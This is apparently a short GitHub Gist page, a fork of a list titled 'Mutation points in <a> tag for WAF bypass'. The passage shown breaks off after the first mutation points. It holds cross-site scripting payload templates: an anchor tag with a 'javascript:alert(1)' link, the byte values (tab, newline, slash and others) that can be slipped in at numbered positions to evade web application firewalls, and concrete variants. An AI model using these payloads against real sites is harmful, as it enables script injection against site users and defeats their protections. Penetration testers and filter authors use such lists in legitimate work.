Skip to content

Instantly share code, notes, and snippets.

View isanghyeon's full-sized avatar

h9e0n isanghyeon

  • Korea
View GitHub Profile
@isanghyeon
isanghyeon / mutation_a.txt
Created June 18, 2020 05:21 — forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]